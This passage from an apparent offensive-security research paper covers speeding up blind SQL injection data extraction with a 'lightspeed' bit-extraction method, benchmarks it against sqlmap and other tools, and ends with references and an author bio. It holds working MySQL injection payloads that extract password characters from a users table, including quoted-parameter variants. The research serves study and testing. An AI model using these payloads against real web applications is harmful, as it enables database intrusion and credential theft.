of its bits “on”, leaving the extracted bits unaffected due to the nature
of bitwise AND.


	?id=3 & (SELECT
	CONV(MID(LPAD(BIN(ASCII(MID(password,1,1))),8,'0'),1,3),2,10) FROM users
	LIMIT 1)


2.2.7. Use in quote encapsulated parameters

Even though it might appear that this method is only useful against numeric
injections, it is also possible to use it with quoted parameters:


	?id=' | (SELECT
	CONV(MID(LPAD(BIN(ASCII(MID(password,1,1))),8,'0'),1,3),2,10) FROM users
	LIMIT 1) -- -'


Some DBMS automatically cast strings into numbers in certain operations.


2.2.8. further optimization of lightspeed.py

When facing a numeric injection, there is actually no need to perform a
bitwise operation, we can shorten the injection to just select the bits
we’re interested in and assign their decimal value to the requested GET
parameter:


	http://vulnerable.com/?id=(SELECT
	CONV(MID(LPAD(BIN(ASCII(MID(password,1,1))),8,'0'), 1,3),2,10)FROM users
	LIMIT 1)


2.8 The blind problem 

Despite the OWASP’s definition (cited earlier in this document) of what a
Blind SQL injection is, some people argue that a strictly blind injection
is when the query has no effect at all in the server’s response; in other
words: the application always replies with the same content regardless of
the query’s result. However, it is extremely rare to encounter scenarios
that meet this condition. The most common ones are INSERT and UPDATE
statements, and even in such cases, the injection is almost never blind
because of the following reasons: When an INSERT statement is vulnerable to
SQL injection, usually the attacker has to try sending multiple different
injections with different numbers of values because it is very difficult to
know in advance how many values must be inserted depending on the structure
of the original query, so generally many invalid injections are sent until
the correct query structure is found and the injection succeeds. All of
these invalid queries usually cause the application to display an error
message; This means that the query indeed had an effect on the server’s
response, causing a notable difference in behavior. Also, even if the code
of the vulnerable page is sloppy and doesn’t show any errors if the INSERT
query fails, the attacker can consult other parts of the website that might
reveal if the query was successful. For example, if a user account
registration form is vulnerable to SQL injection and always responds with
the same content regardless if the query was successful or not, usually
there are pages where the user account information is displayed, such as a
public or private profile, or by seeing if the user was registered. Because
of this, in most cases, the query results are indeed visible; the injection
isn’t really blind (according to the alternative strict definition some
people have). This commonly happens with UPDATE statements as well.

A situation in which an injectable INSERT statement is purely blind could
be a logging mechanism.

In the case of SELECT statements, encountering strictly blind scenarios is
also extremely rare: The majority of web applications that perform SELECT
queries containing user input, do it with the finality of displaying
different dynamic content depending on the parameters sent by the user.
Some examples of these types of applications are:
	- Online stores
	- Blogs
	- Logins
	- Forums
	- News websites
	- Articles websites etc...

These include most web applications out there. It can be concluded that
lightspeed works on a very big percentage of applications vulnerable to SQL
injection.  You can see a demo of this tool in action already available in
youtube [9].


3. Comparison between all the methods

A case-study has been made to compare the efficiency of the different
methods covered in this paper. These tests were run in a local LAMP
environment with an 8 × Intel® Core™ i5-1035G1 CPU @ 1.00GHz

Do notice that sqlmap has been compiled which makes the execution time much faster. We're
comparing the results against a not-compiled script.

3.1. Hexadecimal Strings

	Test-case: 10 32-bit MD5 hashed passwords
	Length: 320 bytes
	Method	        	Total requests	Time		Requests per character
	------------------------------------------------------------------------------
	Bisection (sqlmap)	?		4 seconds		7
	sql-anding		2,652		4 seconds		8
	pos2bin			1,900		5 seconds		5.9
	Duality			2,616		8 seconds		5.6
	Lightspeed		1008		2 seconds		3.2


3.2. First 50 table names

	Test-case: table_name from information_schema.tables limit 50
	Method			Total requests	Time
	---------------------------------------------------
	sql-anding		6,300		10 seconds
	Duality			6,090		36 seconds
	Lightspeed		2,401		5 seconds


4. Extraction Strategies

4.1. Comparison between compressed string lengths

To further accelerate the data extraction process, the built-in compress()
function can be used. The following table shows the corresponding lengths
of group concatenated strings and their respective compressed lengths.


	Query				Length		compress()
	-----------------------------------------------------------------
	group_concat(table_name)	1024		440
	json_arrayagg(table_name)	1316		447
	group_concat(column_name)	1024		458
	json_arrayagg(column_name)	56897		8313


4.2. Comparison between group extraction or one-by-one extraction

The functions group_concat() or json_arrayagg() can be used to concatenate
the whole result of the query into a single string. In contrast, if LIMIT
is used only one item will be retrieved for each request and the index for
the LIMIT clause would have to be incremented until the whole items are
iterated.

The disadvantage over group_conat or json_arrayagg() is that for each
request the DBMS will have to do a huge concatenation which uses a
considerable execution time.  For this reason, a case-study was made to see
if using a string concatenation function is faster than iterating through
all the elements using LIMIT. The results are in Table 3.


	Method			 Total time
	-----------------------------------
	group_concat()		15 sec
	LIMIT n,1		13 sec


5. Conclusions

The most popular attack vector for Blind SQL Injections in actual times
(July 20th, 2023) can be improved and optimized in different ways to
perform data extraction in faster intervals of time. The best tool to use
depends on the nature of the injection.

Do have in mind that sqlmap has been compiled which speeds-up the program drastically.
It is yet to be seen how the other tools compare against it once they're compiled as well.


7. References

[1]    https://github.com/sqlmapproject/sqlmap/wiki/Techniques
[2] https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf
[3] https://enderspub.kubertu.com/blind-mysql-injection-using-bit-shifting
[4] https://stealingthe.network/efficient-time-based-blind-sql-injection-using-mysql-bit-functions-and-operators/
[5] https://ajxchapman.github.io/security/2017/01/14/blind-sql-injection.html
[6] http://blog.k3170makan.com/2012/01/bit-shifting-blind-injection-simplified.html
[7] https://youtu.be/HMzq_KoTFxU
[8] https://owasp.org/www-community/attacks/Blind_SQL_Injection
[9] https://youtu.be/_hvv5OBWed4
[10]https://www.websec.ca/publication/Blog/solutions-challenge-2B
 

Author
------

Ruben Ventura got involved in the field of hacking and
info-sec around 20 years ago. He has worked performing pen-tests and
security assessments for many international firms, governments and
law-enforcement agencies from all around the world (also a bank). He has
been presented as a speaker and trainer at many different conferences, such
as OWASP Global AppSec USA 2020, HackFest Quebec and Bsides Philly.

His interests include hacking, neuropharmacology, meditation, music
production, theoretical physics, psychology, lifting weights and coffee.

http://nzt-48.org
@tr3w_